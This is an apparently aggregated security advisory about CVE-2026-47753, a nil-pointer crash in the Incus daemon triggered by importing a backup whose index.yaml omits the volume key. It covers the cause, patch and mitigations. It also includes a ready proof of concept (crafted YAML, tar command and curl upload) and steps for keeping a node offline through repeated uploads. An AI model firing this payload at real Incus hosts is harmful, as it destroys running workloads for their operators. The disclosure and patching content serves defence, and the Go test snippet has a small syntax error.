Incus (Container/VM Manager) Nil-Pointer Dereference, CVE-2026-47753 (Medium) -DC-Jun2026-389

By /

Listen to this Post

The vulnerability resides in the `(backend).CreateInstanceFromBackup` function within internal/server/storage/backend.go. An authenticated user with `can_create` permission on any project can remotely crash the entire Incus daemon by uploading a maliciously crafted backup tarball.
The root cause is a nil‑pointer dereference on line 795 of backend.go, where the code accesses `srcBackup.Config.Volume.Config[“block.type”]` without first verifying that `Volume` is non‑nil. While the caller (createFromBackup in cmd/incusd/instances_post.go) correctly checks that `Config` and `Config.Container` are not nil, it does not validate the `Volume` field.
The `Volume` field in `internal/server/backup/config.Config` has type `api.StorageVolume` with the YAML tag yaml:"volume,omitempty". If a backup’s `index.yaml` omits the `volume:` key entirely, the field decodes to nil. The code then proceeds to the unguarded dereference on line 795, causing a panic.
Because no `recover()` is installed in the call chain, the Go runtime terminates the entire `incusd` process. All running containers, VMs, and operations on that cluster node are abruptly killed, and the API becomes unavailable until the daemon is manually restarted. Repeated exploitation can keep the node offline, resulting in a persistent denial of service.
The attack vector is the Incus REST API (port 8443 or unix socket) with the endpoint `POST /1.0/instances?project=

` and Content‑Type: application/octet‑stream. The request body is an uncompressed tar (or supported compressed format) that contains a single file `backup/index.yaml` which lists `container:` and `pool:` but deliberately omits volume:.
The issue is a sibling of GHSA‑fwj8‑62r8‑8p8m, GHSA‑r7w7‑mmxr‑47r9, and GHSA‑x5r6‑jr56‑89pv (all assigned 2026‑05‑04), which patched adjacent fields in the same `backup/config.Config` struct. This particular path was missed, leaving the instance‑import route vulnerable.

DailyCVE Form:

Platform: Incus
Version: ≤6.21.0
Vulnerability: Nil‑pointer dereference
Severity: Medium (CVSS 6.5)
date: 2026‑05‑28

Prediction: Patch: 2026‑05‑30

What Undercode Say

Create the malicious index.yaml
cat > backup/index.yaml <<EOF
name: poc
backend: dir
pool: default
type: container
optimized: false
optimized_header: false
config:
container:
name: poc
architecture: x86_64
type: container
pool:
name: default
driver: dir
volume key is intentionally omitted
EOF
Build the tarball (2560 bytes)
tar -cf evil-backup.tar backup/index.yaml
Upload the tarball to trigger the crash
curl -k -X POST https://incus-server:8443/1.0/instances?project=default \
-H "Content-Type: application/octet-stream" \
--data-binary @evil-backup.tar

Go unit test confirming the nil dereference:

func TestPoCNilDerefVolumeImport(t testing.T) {
var bi pocInfo
yaml.Unmarshal([]byte(evilIndex), &bi)
defer func() { recover() }()
// Direct copy of backend.go:795 – panics when Volume == nil
_ = bi.Config.Volume.Config["block.type"]
}

Exploit

  1. Authentication: Any user with a valid TLS client certificate, OIDC token, or access to the Unix socket that has the `can_create` permission on at least one project.
  2. Crafting: Create a YAML file that omits the `volume:` field and pack it into a tar archive.
  3. Delivery: Send a `POST /1.0/instances` request with the tarball as the binary body.
  4. Result: The `incusd` process panics and exits immediately, crashing all workloads on that cluster member.
  5. Persistence: Repeatedly uploading the same tarball keeps the daemon offline until an administrator intervenes.

Protection

  • Patch: Upgrade to Incus 7.0.0‑2 (or any version containing commit 9c77336) which replaces the unsafe dereference with a guarded `volumeConfig` variable.
  • Backport: For versions 6.0.x, apply the patch from `9c77336` that checks `Volume != nil` before accessing its `Config` map.
  • Temporary Mitigation: Restrict `can_create` permissions to only the most trusted users, or place the REST API behind a reverse proxy that inspects uploaded backup files for the missing `volume:` key.
  • Workload Isolation: Run critical containers on separate cluster nodes so a crash on one node does not affect the entire fleet.

Impact

  • Availability: Complete denial of service – the `incusd` process terminates, killing all running containers, VMs, and ongoing operations on that cluster member. The REST API becomes unresponsive until the daemon is restarted manually.
  • Privilege Required: Low – any authenticated user with instance creation rights in a project can trigger the crash.
  • Network Exposure: The Incus API (default TCP 8443 or Unix socket) is the attack surface.
  • CVSS v3.1 Vector: `AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H` (Base Score 6.5, Medium).

🎯Let’s Practice Exploiting & Learn Patching For Free:

🎓 Live Courses & Certifications:

Join Undercode Academy for Verified Certifications

🚀 Request a Custom Project:

Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top